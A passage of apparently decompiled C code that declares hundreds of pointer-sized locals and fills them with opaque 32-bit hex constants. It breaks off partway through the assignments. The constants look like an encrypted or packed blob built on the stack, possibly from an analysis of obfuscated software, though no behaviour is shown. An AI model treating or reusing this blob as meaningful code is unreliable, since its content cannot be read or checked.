                  				intOrPtr _v140;
                  				intOrPtr _v144;
                  				intOrPtr _v148;
                  				intOrPtr _v152;
                  				intOrPtr _v156;
                  				intOrPtr _v160;
                  				intOrPtr _v164;
                  				intOrPtr _v168;
                  				intOrPtr _v172;
                  				intOrPtr _v176;
                  				intOrPtr _v180;
                  				intOrPtr _v184;
                  				intOrPtr _v188;
                  				intOrPtr _v192;
                  				intOrPtr _v196;
                  				intOrPtr _v200;
                  				intOrPtr _v204;
                  				intOrPtr _v208;
                  				intOrPtr _v212;
                  				intOrPtr _v216;
                  				intOrPtr _v220;
                  				intOrPtr _v224;
                  				intOrPtr _v228;
                  				intOrPtr _v232;
                  				intOrPtr _v236;
                  				intOrPtr _v240;
                  				intOrPtr _v244;
                  				intOrPtr _v248;
                  				intOrPtr _v252;
                  				intOrPtr _v256;
                  				intOrPtr _v260;
                  				intOrPtr _v264;
                  				intOrPtr _v268;
                  				intOrPtr _v272;
                  				intOrPtr _v276;
                  				intOrPtr _v280;
                  				intOrPtr _v284;
                  				intOrPtr _v288;
                  				intOrPtr _v292;
                  				intOrPtr _v296;
                  				intOrPtr _v300;
                  				intOrPtr _v304;
                  				intOrPtr _v308;
                  				intOrPtr _v312;
                  				intOrPtr _v316;
                  				intOrPtr _v320;
                  				intOrPtr _v324;
                  				intOrPtr _v328;
                  				intOrPtr _v332;
                  				intOrPtr _v336;
                  				intOrPtr _v340;
                  				intOrPtr _v344;
                  				intOrPtr _v348;
                  				intOrPtr _v352;
                  				intOrPtr _v356;
                  				intOrPtr _v360;
                  				intOrPtr _v364;
                  				intOrPtr _v368;
                  				intOrPtr _v372;
                  				intOrPtr _v376;
                  				intOrPtr _v380;
                  				intOrPtr _v384;
                  				intOrPtr _v388;
                  				intOrPtr _v392;
                  				intOrPtr _v396;
                  				intOrPtr _v400;
                  				intOrPtr _v404;
                  				intOrPtr _v408;
                  				intOrPtr _v412;
                  				intOrPtr _v416;
                  				intOrPtr _v420;
                  				intOrPtr _v424;
                  				intOrPtr _v428;
                  				intOrPtr _v432;
                  				intOrPtr _v436;
                  				intOrPtr _v440;
                  				intOrPtr _v444;
                  				intOrPtr _v448;
                  				intOrPtr _v452;
                  				intOrPtr _v456;
                  				intOrPtr _v460;
                  				intOrPtr _v464;
                  				intOrPtr _v468;
                  				intOrPtr _v472;
                  				intOrPtr _v476;
                  				intOrPtr _v480;
                  				intOrPtr _v484;
                  				intOrPtr _v488;
                  				intOrPtr _v492;
                  				intOrPtr _v496;
                  				intOrPtr _v500;
                  				intOrPtr _v504;
                  				intOrPtr _v508;
                  				intOrPtr _v512;
                  				intOrPtr _v516;
                  				intOrPtr _v520;
                  				intOrPtr _v524;
                  				intOrPtr _v528;
                  				intOrPtr _v532;
                  				intOrPtr _v536;
                  				intOrPtr _v540;
                  				intOrPtr _v544;
                  				intOrPtr _v548;
                  				intOrPtr _v552;
                  				intOrPtr _v556;
                  				intOrPtr _v560;
                  				intOrPtr _v564;
                  				intOrPtr _v568;
                  				intOrPtr _v572;
                  				intOrPtr _v576;
                  				intOrPtr _v580;
                  				intOrPtr _v584;
                  				intOrPtr _v588;
                  				intOrPtr _v592;
                  				intOrPtr _v596;
                  				intOrPtr _v600;
                  				intOrPtr _v604;
                  				intOrPtr _v608;
                  				intOrPtr _v612;
                  				intOrPtr _v616;
                  				intOrPtr _v620;
                  				intOrPtr _v624;
                  				intOrPtr _v628;
                  				intOrPtr _v632;
                  				intOrPtr _v636;
                  				intOrPtr _v640;
                  				intOrPtr _v644;
                  				intOrPtr _v648;
                  				intOrPtr _v652;
                  				intOrPtr _v656;
                  				intOrPtr _v660;
                  				intOrPtr _v664;
                  				intOrPtr _v668;
                  				intOrPtr _v672;
                  				intOrPtr _v676;
                  				intOrPtr _v680;
                  				intOrPtr _v684;
                  				intOrPtr _v688;
                  				intOrPtr _v692;
                  				intOrPtr _v696;
                  				intOrPtr _v700;
                  				intOrPtr _v704;
                  				intOrPtr _v708;
                  				intOrPtr _v712;
                  				intOrPtr _v716;
                  				intOrPtr _v720;
                  				intOrPtr _v724;
                  				intOrPtr _v728;
                  				intOrPtr _v732;
                  				intOrPtr _v736;
                  				intOrPtr _v740;
                  				intOrPtr _v744;
                  				intOrPtr _v748;
                  				intOrPtr _v752;
                  				intOrPtr _v756;
                  				intOrPtr _v760;
                  				intOrPtr _v764;
                  				intOrPtr _v768;
                  				intOrPtr _v772;
                  				intOrPtr _v776;
                  				intOrPtr _v780;
                  				intOrPtr _v784;
                  				intOrPtr _v788;
                  				intOrPtr _v792;
                  				intOrPtr _v796;
                  				intOrPtr _v800;
                  				intOrPtr _v804;
                  				intOrPtr _v808;
                  				intOrPtr _v812;
                  				intOrPtr _v816;
                  				intOrPtr _v820;
                  				intOrPtr _v824;
                  				intOrPtr _v828;
                  				intOrPtr _v832;
                  				intOrPtr _v836;
                  				intOrPtr _v840;
                  				intOrPtr _v844;
                  				intOrPtr _v848;
                  				intOrPtr _v852;
                  				intOrPtr _v856;
                  				intOrPtr _v860;
                  				intOrPtr _v864;
                  				intOrPtr _v868;
                  				intOrPtr _v872;
                  				intOrPtr _v876;
                  				intOrPtr _v880;
                  				intOrPtr _v884;
                  				intOrPtr _v888;
                  				intOrPtr _v892;
                  				intOrPtr _v896;
                  				intOrPtr _v900;
                  				intOrPtr _v904;
                  				intOrPtr _v908;
                  				intOrPtr _v912;
                  				intOrPtr _v916;
                  				intOrPtr _v920;
                  				intOrPtr _v924;
                  				intOrPtr _v928;
                  				intOrPtr _v932;
                  				intOrPtr _v936;
                  				intOrPtr _v940;
                  				intOrPtr _v944;
                  				intOrPtr _v948;
                  				intOrPtr _v952;
                  				intOrPtr _v956;
                  				intOrPtr _v960;
                  				intOrPtr _v964;
                  				intOrPtr _v968;
                  				intOrPtr _v972;
                  				intOrPtr _v976;
                  				intOrPtr _v980;
                  				intOrPtr _v984;
                  				intOrPtr _v988;
                  				intOrPtr _v992;
                  				intOrPtr _v996;
                  				intOrPtr _v1000;
                  				intOrPtr _v1004;
                  				intOrPtr _v1008;
                  				intOrPtr _v1012;
                  				intOrPtr _v1016;
                  				intOrPtr _v1020;
                  				intOrPtr _v1024;
                  				intOrPtr _v1028;
                  				intOrPtr _v1032;
                  				intOrPtr _v1036;
                  				intOrPtr _v1040;
                  				intOrPtr _v1044;
                  				intOrPtr _v1048;
                  				intOrPtr _v1052;
                  				intOrPtr _v1056;
                  				intOrPtr _v1060;
                  				intOrPtr _v1064;
                  				intOrPtr _v1068;
                  				intOrPtr _v1072;
                  				intOrPtr _v1076;
                  				intOrPtr _v1080;
                  				intOrPtr _v1084;
                  				intOrPtr _v1088;
                  				intOrPtr _v1092;
                  				intOrPtr _v1096;
                  				intOrPtr _v1100;
                  				intOrPtr _v1104;
                  				intOrPtr _v1108;
                  				intOrPtr _v1112;
                  				intOrPtr _v1116;
                  				intOrPtr _v1120;
                  				intOrPtr _v1124;
                  				intOrPtr _v1128;
                  				intOrPtr _v1132;
                  				intOrPtr _v1136;
                  				intOrPtr _v1140;
                  				intOrPtr _v1144;
                  				intOrPtr _v1148;
                  				intOrPtr _v1152;
                  				intOrPtr _v1156;
                  				intOrPtr _v1160;
                  				intOrPtr _v1164;
                  				intOrPtr _v1168;
                  				intOrPtr _v1172;
                  				intOrPtr _v1176;
                  				intOrPtr _v1180;
                  				intOrPtr _v1184;
                  				intOrPtr _v1188;
                  				intOrPtr _v1192;
                  				intOrPtr _v1196;
                  				intOrPtr _v1200;
                  				intOrPtr _v1204;
                  				intOrPtr _v1208;
                  				intOrPtr _v1212;
                  				intOrPtr _v1216;
                  				intOrPtr _v1220;
                  				intOrPtr _v1224;
                  				intOrPtr _v1228;
                  				intOrPtr _v1232;
                  				intOrPtr _v1236;
                  				intOrPtr _v1240;
                  				intOrPtr _v1244;
                  				intOrPtr _v1248;
                  				intOrPtr _v1252;
                  				intOrPtr _v1256;
                  				intOrPtr _v1260;
                  				intOrPtr _v1264;
                  				intOrPtr _v1268;
                  				intOrPtr _v1272;
                  				intOrPtr _v1276;
                  				intOrPtr _v1280;
                  				intOrPtr _v1284;
                  				intOrPtr _v1288;
                  				intOrPtr _v1292;
                  				intOrPtr _v1296;
                  				intOrPtr _v1300;
                  				intOrPtr _v1304;
                  				intOrPtr _v1308;
                  				intOrPtr _v1312;
                  				intOrPtr _v1316;
                  				intOrPtr _v1320;
                  				intOrPtr _v1324;
                  				intOrPtr _v1328;
                  				intOrPtr _v1332;
                  				intOrPtr _v1336;
                  				intOrPtr _v1340;
                  				intOrPtr _v1344;
                  				intOrPtr _v1348;
                  				intOrPtr _v1352;
                  				intOrPtr _v1356;
                  				intOrPtr _v1360;
                  				intOrPtr _v1364;
                  				intOrPtr _v1368;
                  				intOrPtr _v1372;
                  				intOrPtr _v1376;
                  				intOrPtr _v1380;
                  				intOrPtr _v1384;
                  				intOrPtr _v1388;
                  				intOrPtr _v1392;
                  				intOrPtr _v1396;
                  				intOrPtr _v1400;
                  				intOrPtr _v1404;
                  				intOrPtr _v1408;
                  				intOrPtr _v1412;
                  				intOrPtr _v1416;
                  				intOrPtr _v1420;
                  				intOrPtr _v1424;
                  				intOrPtr _v1428;
                  				intOrPtr _v1432;
                  				intOrPtr _v1436;
                  				intOrPtr _v1440;
                  				intOrPtr _v1444;
                  				intOrPtr _v1448;
                  				intOrPtr _v1452;
                  				intOrPtr _v1456;
                  				intOrPtr _v1460;
                  				intOrPtr _v1464;
                  				intOrPtr _v1468;
                  				intOrPtr _v1472;
                  				intOrPtr _v1476;
                  				intOrPtr _v1480;
                  				intOrPtr _v1484;
                  				intOrPtr _v1488;
                  				intOrPtr _v1492;
                  				intOrPtr _v1496;
                  				intOrPtr _v1500;
                  				intOrPtr _v1504;
                  				intOrPtr _v1508;
                  				intOrPtr _v1512;
                  				intOrPtr _v1516;
                  				intOrPtr _v1520;
                  				intOrPtr _v1524;
                  				intOrPtr _v1528;
                  				intOrPtr _v1532;
                  				intOrPtr _v1536;
                  				intOrPtr _v1540;
                  				intOrPtr _v1544;
                  				intOrPtr _v1548;
                  				intOrPtr _v1552;
                  				intOrPtr _v1556;
                  				intOrPtr _v1560;
                  				intOrPtr _v1564;
                  				intOrPtr _v1568;
                  				intOrPtr _v1572;
                  				intOrPtr _v1576;
                  				intOrPtr _v1580;
                  				intOrPtr _v1584;
                  				intOrPtr _v1588;
                  				intOrPtr _v1592;
                  				intOrPtr _v1596;
                  				intOrPtr _v1600;
                  				intOrPtr _v1604;
                  				intOrPtr _v1608;
                  				intOrPtr _v1612;
                  				intOrPtr _v1616;
                  				intOrPtr _v1620;
                  				intOrPtr _v1624;
                  				intOrPtr _v1628;
                  				intOrPtr _v1632;
                  				intOrPtr _v1636;
                  				intOrPtr _v1640;
                  				intOrPtr _v1644;
                  				intOrPtr _v1648;
                  				intOrPtr _v1652;
                  				intOrPtr _v1656;
                  				intOrPtr _v1660;
                  				intOrPtr _v1664;
                  				intOrPtr _v1668;
                  				intOrPtr _v1672;
                  				intOrPtr _v1676;
                  				intOrPtr _v1680;
                  				intOrPtr _v1684;
                  				intOrPtr _v1688;
                  				intOrPtr _v1692;
                  				intOrPtr _v1696;
                  				intOrPtr _v1700;
                  				intOrPtr _v1704;
                  				intOrPtr _v1708;
                  				intOrPtr _v1712;
                  				intOrPtr _v1716;
                  				intOrPtr _v1720;
                  				intOrPtr _v1724;
                  				intOrPtr _v1728;
                  				intOrPtr _v1732;
                  				intOrPtr _v1736;
                  				intOrPtr _v1740;
                  				intOrPtr _v1744;
                  				intOrPtr _v1748;
                  				intOrPtr _v1752;
                  				intOrPtr _v1756;
                  				intOrPtr _v1760;
                  				intOrPtr _v1764;
                  				intOrPtr _v1768;
                  				intOrPtr _v1772;
                  				intOrPtr _v1776;
                  				intOrPtr _v1780;
                  				intOrPtr _v1784;
                  				intOrPtr _v1788;
                  				intOrPtr _v1792;
                  				intOrPtr _v1796;
                  				intOrPtr _v1800;
                  				intOrPtr _v1804;
                  				intOrPtr _v1808;
                  				intOrPtr _v1812;
                  				intOrPtr _v1816;
                  				intOrPtr _v1820;
                  				intOrPtr _v1824;
                  				intOrPtr _v1828;
                  				intOrPtr _v1832;
                  				intOrPtr _v1836;
                  				intOrPtr _v1840;
                  				intOrPtr _v1844;
                  				intOrPtr _v1848;
                  				intOrPtr _v1852;
                  				intOrPtr _v1856;
                  				intOrPtr _v1860;
                  				intOrPtr _v1864;
                  				intOrPtr _v1868;
                  				intOrPtr _v1872;
                  				intOrPtr _v1876;
                  				intOrPtr _v1880;
                  				intOrPtr _v1884;
                  				intOrPtr _v1888;
                  				intOrPtr _v1892;
                  				intOrPtr _v1896;
                  				intOrPtr _v1900;
                  				intOrPtr _v1904;
                  				intOrPtr _v1908;
                  				intOrPtr _v1912;
                  				intOrPtr _v1916;
                  				intOrPtr _v1920;
                  				intOrPtr _v1924;
                  				intOrPtr _v1928;
                  				intOrPtr _v1932;
                  				intOrPtr _v1936;
                  				intOrPtr _v1940;
                  				intOrPtr _v1944;
                  				intOrPtr _v1948;
                  				intOrPtr _v1952;
                  				intOrPtr _v1956;
                  				intOrPtr _v1960;
                  				intOrPtr _v1964;
                  				intOrPtr _v1968;
                  				intOrPtr _v1972;
                  				intOrPtr _v1976;
                  				intOrPtr _v1980;
                  				intOrPtr _v1984;
                  				intOrPtr _v1988;
                  				intOrPtr _v1992;
                  				intOrPtr _v1996;
                  				intOrPtr _v2000;
                  				intOrPtr _v2004;
                  				intOrPtr _v2008;
                  				intOrPtr _v2012;
                  				char _v2016;
                  				struct HINSTANCE__* _t506;
                  
                  				_v2016 = 0x18cc9019;
                  				_v2012 = 0xfc13bd0b;
                  				_v2008 = 0xd3055123;
                  				_v2004 = 0xfefbe9e2;
                  				_v2000 = 0x33514f2d;
                  				_v1996 = 0x3a9ec3b2;
                  				_v1992 = 0x4e73ef30;
                  				_v1988 = 0x5297271a;
                  				_v1984 = 0x2617a6ff;
                  				_v1980 = 0xd827466e;
                  				_v1976 = 0x7b1d390a;
                  				_v1972 = 0xcd18d019;
                  				_v1968 = 0x21d65d43;
                  				_v1964 = 0x3934b95;
                  				_v1960 = 0xa4200f47;
                  				_v1956 = 0x701eb724;
                  				_v1952 = 0xa10f78fe;
                  				_v1948 = 0xc30a8a91;
                  				_v1944 = 0xafee2c35;
                  				_v1940 = 0x2014674f;
                  				_v1936 = 0x82b976a7;
                  				_v1932 = 0xf8d1ef8c;
                  				_v1928 = 0xaf5f6f2a;
                  				_v1924 = 0x6d7bb63;
                  				_v1920 = 0x2c5506c;
                  				_v1916 = 0x57d61a32;
                  				_v1912 = 0xa54bb9df;
                  				_v1908 = 0x29098018;
                  				_v1904 = 0x9689a1a3;
                  				_v1900 = 0x19d0c8f1;
                  				_v1896 = 0x57673daf;
                  				_v1892 = 0xf2a532af;
                  				_v1888 = 0x240475f7;
                  				_v1884 = 0x46cfe7f3;
                  				_v1880 = 0xad58dce4;
                  				_v1876 = 0x18207d91;
                  				_v1872 = 0x3c1b0996;
                  				_v1868 = 0x813bb415;
                  				_v1864 = 0xf0ad736b;
                  				_v1860 = 0x9a67c68b;
                  				_v1856 = 0xf3b4eed5;
                  				_v1852 = 0x69844a1f;
                  				_v1848 = 0xea145883;
                  				_v1844 = 0x822acb0b;
                  				_v1840 = 0x13884116;
                  				_v1836 = 0xe76b15dc;
                  				_v1832 = 0x26b2f835;
                  				_v1828 = 0x58c0b0a6;
                  				_v1824 = 0x4f99480f;
                  				_v1820 = 0x8317945d;
                  				_v1816 = 0x11186d36;
                  				_v1812 = 0xa36486f9;
                  				_v1808 = 0x592784c3;
                  				_v1804 = 0xb01fe73f;
                  				_v1800 = 0xee7691d5;
                  				_v1796 = 0x3ca59d41;
                  				_v1792 = 0x1ffeb2f4;
                  				_v1788 = 0xe8c4b804;
                  				_v1784 = 0x6a6fa9f2;
                  				_v1780 = 0x52f14fe3;
                  				_v1776 = 0xee467e7e;
                  				_v1772 = 0x1f34eb8;
                  				_v1768 = 0xb5b476c8;
                  				_v1764 = 0x658faff9;
                  				_v1760 = 0x2dad05f2;
                  				_v1756 = 0x9aad0b6e;
                  				_v1752 = 0xe77b8f07;
                  				_v1748 = 0x888beb88;
                  				_v1744 = 0xc35503bc;
                  				_v1740 = 0x4e8b0f48;
                  				_v1736 = 0xce740bb1;
                  				_v1732 = 0xc39d368e;
                  				_v1728 = 0x1b88bdf7;
                  				_v1724 = 0x23e57627;
                  				_v1720 = 0xb4788768;
                  				_v1716 = 0xf19eaf6c;
                  				_v1712 = 0xdbe1454f;
                  				_v1708 = 0xc871bcfc;
                  				_v1704 = 0x127e5dbe;
                  				_v1700 = 0xfe3e9d14;
                  				_v1696 = 0x22f72f43;
                  				_v1692 = 0x4312baa6;
                  				_v1688 = 0xad4a5ecb;
                  				_v1684 = 0xa028fea5;
                  				_v1680 = 0x761b3243;
                  				_v1676 = 0x34966a1c;
                  				_v1672 = 0xf6973c49;
                  				_v1668 = 0x8a40440c;
                  				_v1664 = 0xee39029a;
                  				_v1660 = 0x7c1e4236;
                  				_v1656 = 0x143df846;
                  				_v1652 = 0x9de53ad0;
                  				_v1648 = 0xc8beea01;
                  				_v1644 = 0x29cc1c2d;
                  				_v1640 = 0x7f4431a8;
                  				_v1636 = 0xfec5cc0;
                  				_v1632 = 0x6ee37ac8;
                  				_v1628 = 0xacbebd8b;
                  				_v1624 = 0xbb86f15c;
                  				_v1620 = 0xb7b48568;
                  				_v1616 = 0x29e47454;
                  				_v1612 = 0xf3a9637c;
                  				_v1608 = 0x8f079d8a;
                  				_v1604 = 0xd6149023;
                  				_v1600 = 0x907d15f8;
                  				_v1596 = 0xeab026f;
                  				_v1592 = 0x9e6a4e4b;
                  				_v1588 = 0x4a44c5d3;
                  				_v1584 = 0xd22928bb;
                  				_v1580 = 0xb1fd329a;
                  				_v1576 = 0x1c1576c0;
                  				_v1572 = 0xa4a73685;
                  				_v1568 = 0x36cd5ba3;
                  				_v1564 = 0x1a36c10b;
                  				_v1560 = 0xb0c67415;
                  				_v1556 = 0x4aaaa7c8;
                  				_v1552 = 0xcd5df8dd;
                  				_v1548 = 0x510f2661;
                  				_v1544 = 0x356fdb71;
                  				_v1540 = 0x42269525;
                  				_v1536 = 0x86b8d3a8;
                  				_v1532 = 0xb6e8fd01;
                  				_v1528 = 0x3e8b6d07;
                  				_v1524 = 0x72fbbb5d;
                  				_v1520 = 0xe78325fb;
                  				_v1516 = 0xad00bbae;
                  				_v1512 = 0x81d6f54d;
                  				_v1508 = 0xc51298d;
                  				_v1504 = 0x694576a;
                  				_v1500 = 0x7b073001;
                  				_v1496 = 0xac7097a8;
                  				_v1492 = 0x9ae8794d;
                  				_v1488 = 0xdcb3999d;
                  				_v1484 = 0x39910103;
                  				_v1480 = 0x272c8a0d;
                  				_v1476 = 0xd994c963;
                  				_v1472 = 0xb8caa410;
                  				_v1468 = 0x77ea86db;
                  				_v1464 = 0x4f48a441;
                  				_v1460 = 0xedf95ffe;
                  				_v1456 = 0xe35319f5;
                  				_v1452 = 0x8e7481a9;
                  				_v1448 = 0xc0fdafea;
                  				_v1444 = 0xf2265a47;
                  				_v1440 = 0xcf7bb0c5;
                  				_v1436 = 0xf2c353b8;
                  				_v1432 = 0xafbe8713;
                  				_v1428 = 0xa9402955;
                  				_v1424 = 0xae9ed42e;
                  				_v1420 = 0xba8bce00;
                  				_v1416 = 0x2b54a3db;
                  				_v1412 = 0xccf05ebe;
                  				_v1408 = 0xa076ed6b;
                  				_v1404 = 0xcf4d37ba;
                  				_v1400 = 0xd04ca788;
                  				_v1396 = 0x9a366f18;
                  				_v1392 = 0xfc43d964;
                  				_v1388 = 0x740c132a;
                  				_v1384 = 0x7af9ab75;
                  				_v1380 = 0xfe58605f;
                  				_v1376 = 0x45284ada;
                  				_v1372 = 0xdd33943a;
                  				_v1368 = 0x9603722e;
                  				_v1364 = 0x5e202100;
                  				_v1360 = 0x211ec50a;
                  				_v1356 = 0x5e71f48b;
                  				_v1352 = 0x4556bd52;
                  				_v1348 = 0xd305c05b;
                  				_v1344 = 0xe1d91e4;
                  				_v1340 = 0x83541fc2;
                  				_v1336 = 0xcd16994e;
                  				_v1332 = 0x21346b36;
                  				_v1328 = 0x1d77397;
                  				_v1324 = 0x8f9dc5c5;
                  				_v1320 = 0x94434bc3;
                  				_v1316 = 0xf3ce98cc;
                  				_v1312 = 0x5c4aa2fe;
                  				_v1308 = 0xe951eeea;
                  				_v1304 = 0xfd5d5f15;
                  				_v1300 = 0x3cd5a5e6;
                  				_v1296 = 0x61448c10;
                  				_v1292 = 0x86fb9609;
                  				_v1288 = 0xff5281d4;
                  				_v1284 = 0xb85560b1;
                  				_v1280 = 0x4e769b9e;
                  				_v1276 = 0x9c9e9d9a;
                  				_v1272 = 0x5b283c55;
                  				_v1268 = 0xc8b47d7a;
                  				_v1264 = 0x5a493c87;
                  				_v1260 = 0xfad664f9;
                  				_v1256 = 0x5abc71e;
                  				_v1252 = 0x209be785;
                  				_v1248 = 0x98eee0b9;
                  				_v1244 = 0xf45c44cb;
                  				_v1240 = 0xfc890003;
                  				_v1236 = 0xdde376df;
                  				_v1232 = 0x99b519eb;
                  				_v1228 = 0x2f9820c6;
                  				_v1224 = 0xbfd2c76a;
                  				_v1220 = 0x368331be;
                  				_v1216 = 0x34cb7262;
                  				_v1212 = 0x9e286886;
                  				_v1208 = 0xf8033aee;
                  				_v1204 = 0xa641fe10;
                  				_v1200 = 0xb35d5dc1;
                  				_v1196 = 0x4168b366;
                  				_v1192 = 0x879c2bd9;
                  				_v1188 = 0x384ba925;
                  				_v1184 = 0xc19e2084;
                  				_v1180 = 0xc64af4d;
                  				_v1176 = 0x7edca4f4;
                  				_v1172 = 0x9d0c78e7;
                  				_v1168 = 0xa0a5e6d;
                  				_v1164 = 0x10af2866;
                  				_v1160 = 0x9ecf2009;
                  				_v1156 = 0x72e04854;
                  				_v1152 = 0x2d3f4b90;
                  				_v1148 = 0x6090f65;
                  				_v1144 = 0xfa1a3e58;
                  				_v1140 = 0xc7a398be;
                  				_v1136 = 0x7246d83c;
                  				_v1132 = 0x567337f;
                  				_v1128 = 0x39b2583b;
                  				_v1124 = 0xc72a706f;
                  				_v1120 = 0x6f73f905;
                  				_v1116 = 0xad40a50d;
                  				_v1112 = 0x600b404a;
                  				_v1108 = 0x46bbfc74;
                  				_v1104 = 0x1d99e1d9;
                  				_v1100 = 0xf52f3d4f;
                  				_v1096 = 0xf3a9291a;
                  				_v1092 = 0xd83e3d46;
                  				_v1088 = 0x1bf9c7de;
                  				_v1084 = 0xec5f8222;
                  				_v1080 = 0xa64ad53d;
                  				_v1076 = 0x1b00aac3;
                  				_v1072 = 0x5cc80cd4;
                  				_v1068 = 0x23d0ae6a;
                  				_v1064 = 0x9f8356c1;
                  				_v1060 = 0x2cc01cd2;
                  				_v1056 = 0x6b49265;
                  				_v1052 = 0x88a81c59;
                  				_v1048 = 0x36abd356;
                  				_v1044 = 0xa16f51f3;
                  				_v1040 = 0x48f7e779;
                  				_v1036 = 0xd7e3e6d5;
                  				_v1032 = 0x328ad21a;
                  				_v1028 = 0xe1bae1bc;
                  				_v1024 = 0x8857e101;
                  				_v1020 = 0x876ae51f;
                  				_v1016 = 0x87756620;
                  				_v1012 = 0x8eef0fa6;
                  				_v1008 = 0x184ae7f0;
                  				_v1004 = 0xbf30c42d;
                  				_v1000 = 0x40f47861;
                  				_v996 = 0x3a38bcad;
                  				_v992 = 0x1943786e;
                  				_v988 = 0xbb65064b;
                  				_v984 = 0x397aa2c3;
                  				_v980 = 0xc866c4b9;
                  				_v976 = 0xf9379a4e;
                  				_v972 = 0xfef938c3;
                  				_v968 = 0x31bef2e7;
                  				_v964 = 0x38dc8fa2;
                  				_v960 = 0x17200b94;
                  				_v956 = 0xf3234397;
                  				_v952 = 0xce6a264e;
                  				_v948 = 0xed9f43ef;
                  				_v944 = 0x396ff646;
                  				_v940 = 0xfc401490;
                  				_v936 = 0xe8cf621c;
                  				_v932 = 0x9703fa40;
                  				_v928 = 0xad75de4e;
                  				_v924 = 0x4ccf3491;
                  				_v920 = 0xbd007eb2;
                  				_v916 = 0xe40c23c1;
                  				_v912 = 0x801c9ffb;
                  				_v908 = 0x44b47ea6;
                  				_v904 = 0xe4e16921;
                  				_v900 = 0x3019b644;
                  				_v896 = 0x4211747d;
                  				_v892 = 0xc5c07612;
                  				_v888 = 0xe0c8cd28;
                  				_v884 = 0xdb7a8454;
                  				_v880 = 0xeddd87d7;
                  				_v876 = 0x84e2a523;
                  				_v872 = 0xb1a72cee;
                  				_v868 = 0x35fd5e1e;
                  				_v864 = 0x77c1300;
                  				_v860 = 0x44e19c63;
                  				_v856 = 0xcd26a443;
                  				_v852 = 0x6a20bf6d;
                  				_v848 = 0x95cb5336;
                  				_v844 = 0xbb9f097e;
                  				_v840 = 0x16874c91;
                  				_v836 = 0xf504549c;
                  				_v832 = 0x393d32e8;
                  				_v828 = 0x31216bbc;
                  				_v824 = 0x21260832;
                  				_v820 = 0x66ce8284;
                  				_v816 = 0x3d06524e;
                  				_v812 = 0x849b5286;
                  				_v808 = 0xb423b433;
                  				_v804 = 0x82362b32;
                  				_v800 = 0xa5e21bc7;
                  				_v796 = 0xa42133c9;
                  				_v792 = 0xeb7b9cac;
                  				_v788 = 0xe6375659;
                  				_v784 = 0x1035672d;
                  				_v780 = 0xf3745f93;
                  				_v776 = 0xb4435473;
                  				_v772 = 0x1c869446;
                  				_v768 = 0x62fa226;
                  				_v764 = 0x9d47888e;
                  				_v760 = 0x7cb63c6d;
                  				_v756 = 0x22bdfa65;
                  				_v752 = 0x93d8172c;
                  				_v748 = 0x133b2f6b;
                  				_v744 = 0xd91484c1;
                  				_v740 = 0x39138faf;
                  				_v736 = 0x820ffbcf;
                  				_v732 = 0xb0fcdc78;
                  				_v728 = 0x137ac19e;
                  				_v724 = 0xe6036613;
                  				_v720 = 0x1a089bd1;
                  				_v716 = 0x26b8ba50;
                  				_v712 = 0x869fa0d6;
                  				_v708 = 0xbc873eec;
                  				_v704 = 0xc87e3136;
                  				_v700 = 0x4511ee89;
                  				_v696 = 0xa7415ad9;
                  				_v692 = 0x7d3bd1d;
                  				_v688 = 0xb0eb0c53;
                  				_v684 = 0xd7a6619e;
                  				_v680 = 0x78bfa5e6;
                  				_v676 = 0x4089e27b;
                  				_v672 = 0xa1bc213c;
                  				_v668 = 0x16673548;
                  				_v664 = 0x8173ea10;
                  				_v660 = 0xd6d298a6;
                  				_v656 = 0x5ccde102;
                  				_v652 = 0xc73114dc;
                  				_v648 = 0x4f274da2;
                  				_v644 = 0x43a9f7a3;
                  				_v640 = 0xa5bd1e32;
                  				_v636 = 0xa6c08dc1;
                  				_v632 = 0x5d59af79;
                  				_v628 = 0xb79d6c3d;
                  				_v624 = 0x7b95f209;
                  				_v620 = 0x339d4f03;
                  				_v616 = 0xe55c9dda;
                  				_v612 = 0x1d4e12d0;
                  				_v608 = 0x14fb9e12;
                  				_v604 = 0xc04af32b;
                  				_v600 = 0x5398148c;
                  				_v596 = 0xc1b8b7e0;
                  				_v592 = 0x5a046973;
                  				_v588 = 0x8aab4584;
                  				_v584 = 0xa316cf3;
                  				_v580 = 0x8392c969;
                  				_v576 = 0x66d37a42;
                  				_v572 = 0xa39a43d0;
                  				_v568 = 0x72e43df5;
                  				_v564 = 0x7def3a5b;
                  				_v560 = 0xa3e032db;
                  				_v556 = 0xbaae509a;
                  				_v552 = 0x725465ba;
                  				_v548 = 0x180c7d81;
                  				_v544 = 0x811b17e0;
                  				_v540 = 0x74704b5e;
                  				_v536 = 0x22f47ff4;
                  				_v532 = 0xcc6df209;
                  				_v528 = 0x38770f86;
                  				_v524 = 0x4016937a;
                  				_v520 = 0x62212e95;
                  				_v516 = 0x3aecdd;
                  				_v512 = 0x9a86b823;
                  				_v508 = 0xe493bd28;
                  				_v504 = 0x94dafcea;
                  				_v500 = 0x6e43dbbe;
                  				_v496 = 0x11a6291f;
                  				_v492 = 0x68d91615;
                  				_v488 = 0x4076d820;
                  				_v484 = 0xa757a1c7;
                  				_v480 = 0xadc5eff9;
                  				_v476 = 0x1d06787c;
                  				_v472 = 0x48121116;
                  				_v468 = 0xb8042b02;
                  				_v464 = 0xa2423491;
                  				_v460 = 0xd20d9bf7;
                  				_v456 = 0x33d51d03;
                  				_v452 = 0x632db46e;
                  				_v448 = 0x8fce7afe;
                  				_v444 = 0x88271008;
                  				_v440 = 0xefddbe88;
                  				_v436 = 0x24ae9a32;
                  				_v432 = 0x7bf42295;
                  				_v428 = 0x268ba065;
                  				_v424 = 0x124f44dd;
                  				_v420 = 0xba93dab;
                  				_v416 = 0xe06e84b0;
                  				_v412 = 0x8d9ef9eb;
                  				_v408 = 0xa4caef6b;
                  				_v404 = 0xb8f2d0d2;
                  				_v400 = 0x4eef8287;
                  				_v396 = 0x44d6faca;
                  				_v392 = 0xb021dd39;
                  				_v388 = 0x65728ae9;
                  				_v384 = 0x4ac666ee;
                  				_v380 = 0xe2d55fa6;
                  				_v376 = 0xd488f647;
                  				_v372 = 0x377d26a2;
                  				_v368 = 0xb1c3322c;
                  				_v364 = 0xbbb1dfd9;
                  				_v360 = 0x7ef9d65d;
                  				_v356 = 0xd69df707;
                  				_v352 = 0xc8a80235;
                  				_v348 = 0x7ede6d98;
                  				_v344 = 0x5a57d2a2;
                  				_v340 = 0x40af756f;
                  				_v336 = 0x2944fdef;
                  				_v332 = 0x3447d376;
                  				_v328 = 0x7ddf0dbd;
                  				_v324 = 0x8c688b53;
                  				_v320 = 0xdede8f54;
                  				_v316 = 0x1855f41e;
                  				_v312 = 0xfa3bc857;
                  				_v308 = 0x1cc619e7;
                  				_v304 = 0x78f4cf52;
